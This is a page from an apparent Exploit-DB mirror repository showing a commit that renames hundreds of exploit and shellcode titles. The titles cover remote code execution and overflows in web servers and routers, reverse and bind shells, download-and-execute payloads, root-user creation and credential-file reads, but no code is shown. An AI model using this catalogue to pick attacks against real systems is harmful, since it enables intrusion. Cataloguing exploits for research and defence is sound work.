bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/13703.c
Offensive Security cf96346519 DB: 2018-01-25 
124 changes to exploits/shellcodes

Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)
Airsensor M520 - HTTPd Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)

Samsung DVR SHR2040 - HTTPD Remote Denial of Service Denial of Service (PoC)
Samsung DVR SHR2040 - HTTPd Remote Denial of Service Denial of Service (PoC)

Novell ZenWorks 10/11 - TFTPD Remote Code Execution
Novell ZENworks 10/11 - TFTPD Remote Code Execution

Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi
Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi

WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service
WhitSoft SlimServe HTTPd 1.1 - 'GET_ Denial of Service

GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service
GoAhead Web Server 2.1 (Windows) - Denial of Service

Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service
Anti-Web HTTPd 2.2 Script - Engine File Opening Denial of Service

Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow
Rosiello Security Sphiro HTTPd 0.1B - Remote Heap Buffer Overflow

D-Link DWL-G700AP 2.00/2.01 - HTTPD Denial of Service
D-Link DWL-G700AP 2.00/2.01 - HTTPd Denial of Service

Lorex LH300 Series - ActiveX Buffer Overflow (PoC)

Debut Embedded httpd 1.20 - Denial of Service
Debut Embedded HTTPd 1.20 - Denial of Service

Xorg 1.4 < 1.11.2 - File Permission Change
X.Org xorg 1.4 < 1.11.2 - File Permission Change

Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)

ICU library 52 < 54 - Multiple Vulnerabilities

rooter VDSL Device - Goahead WebServer Disclosure
FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure

Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal
Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal

Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow

Debian 2.1 - httpd
Debian 2.1 - HTTPd

Apache 0.8.x/1.0.x / NCSA httpd 1.x - test-cgi Directory Listing
Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing

Inso DynaWeb httpd 3.1/4.0.2/4.1 - Format String
Inso DynaWeb HTTPd 3.1/4.0.2/4.1 - Format String

W3C CERN httpd 3.0 Proxy - Cross-Site Scripting
W3C CERN HTTPd 3.0 Proxy - Cross-Site Scripting

ATP httpd 0.4 - Single Byte Buffer Overflow
ATP HTTPd 0.4 - Single Byte Buffer Overflow

AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow
AN HTTPD 1.38/1.39/1.40/1.41 - 'SOCKS4' Buffer Overflow
Light HTTPd 0.1 - GET Buffer Overflow (1)
Light HTTPd 0.1 - GET Buffer Overflow (2)
Light HTTPd 0.1 - 'GET' Buffer Overflow (1)
Light HTTPd 0.1 - 'GET' Buffer Overflow (2)

Light HTTPD 0.1 (Windows) - Remote Buffer Overflow
Light HTTPd 0.1 (Windows) - Remote Buffer Overflow

Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow
Ultra Mini HTTPd 1.21 - Remote Stack Buffer Overflow

Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)
Ultra Mini HTTPd - Remote Stack Buffer Overflow (Metasploit)

BusyBox 1.01 - HTTPD Directory Traversal
BusyBox 1.01 - HTTPd Directory Traversal

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Ultra Mini HTTPd 1.21 - 'POST' Remote Stack Buffer Overflow (2)
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock'  Remote Command Injection
Apache mod_cgi - 'Shellshock'  Remote Command Injection
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection
Apache mod_cgi - 'Shellshock' Remote Command Injection

IPFire - 'Shellshock'  Bash Environment Variable Command Injection (Metasploit)
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)

AsusWRT Router < 3.0.0.4.380.7743 - Unauthenticated LAN Remote Code Execution

GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)

GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution
GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Remote Code Execution

NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Remote Stack Overflow (Metasploit)

Getsimple 2.01 - Local File Inclusion
Getsimple CMS 2.01 - Local File Inclusion

Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)
Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)

ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload
ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution
ManageEngine EventLog Analyzer - Multiple Vulnerabilities
ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution
ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)

Bash CGI - 'Shellshock' Remote Command Injection  (Metasploit)
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit)

Getsimple 3.0 - 'set' Local File Inclusion
Getsimple CMS 3.0 - 'set' Local File Inclusion

ZENworks Configuration Management 11.3.1 - Remote Code Execution
Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution

Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)
Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (1)

Getsimple - 'path' Local File Inclusion
Getsimple CMS 3.1.2 - 'path' Local File Inclusion

Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)
SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)

ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection
ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection
BMC Track-It! 11.4 - Multiple Vulnerabilities
Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities
SysAid Help Desk 14.4 - Multiple Vulnerabilities
Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities
GetSimple CMS 3.3.1 - Cross-Site Scripting
CMS Made Simple 1.11.9 - Multiple Vulnerabilities
ManageEngine Desktop Central - Create Administrator
ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)
ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities
ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities

Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload

Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)
FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)
FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)
FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)
Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)
Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)

Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)
Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)

Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)

NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)

Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)

Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)
Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)
UnixWare - execve(/bin/sh) Shellcode (95 bytes)

Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode
Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode

Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Windows/x86 (XP SP3) - ShellExecuteA() Shellcode

Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)
Windows  (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)
Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)
Linux/x86 - ip6tables -F Shellcode (47 bytes)
Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)
Linux/i686 - pacman -R <package> Shellcode (59 bytes)

Windows/x86 - JITed Stage-0 Shellcode

Windows/x86 (XP SP2) - WinExec (write.exe) + ExitProcess Shellcode (16 bytes)
Windows/x86 (XP SP2) - WinExec(write.exe) + ExitProcess Shellcode (16 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode
Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)
Linux/x64 - reboot(POWER_OFF) Shellcode (19 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (30 bytes)

Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)
Windows/x64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)

Windows/x86-64 (7) - cmd.exe Shellcode (61 bytes)
Windows/x64 (7) - cmd.exe Shellcode (61 bytes)

Windows - MessageBoxA Shellcode (238 bytes)
Windows - MessageBoxA() Shellcode (238 bytes)

Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x64 - Disable ASLR Security Shellcode (143 bytes)
Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)
Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)
Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)
Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)
Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)
Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)

Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)

Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)
Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)

Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)
Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)
OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)
OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)
ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)

Windows/x86 - Eggsearch Shellcode (33 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)
OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)

OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode
OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode

Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)

Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)
Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)

Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode
Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode

Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)

Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)
Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)
Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)

Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)
Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)

Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)
Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Linux/x64 - execve() Encoded Shellcode (57 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)
Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)
Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)
OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)
OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)
Linux/x86-64 - execve() Shellcode (22 bytes)
Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)
Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x64 - execve() Shellcode (22 bytes)
Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes)
Linux/x64 - execve() + Polymorphic Shellcode (31 bytes)
Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)
Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (26 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1)
Linux/x64 - execve(/bin/bash) Shellcode (33 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)
Linux/x64 - Read /etc/passwd Shellcode (65 bytes)
Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)

Linux/x86-64 - Bind TCP Shell Shellcode (Generator)
Linux/x64 - Bind TCP Shell Shellcode (Generator)
Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)
Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)

Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)
Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)
Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)

Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)

Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)

Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)
Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)

Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)

Windows/x86 - MessageBoxA Shellcode (242 bytes)
Windows/x86 - MessageBoxA() Shellcode (242 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)
Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)
Linux/x64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)
Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
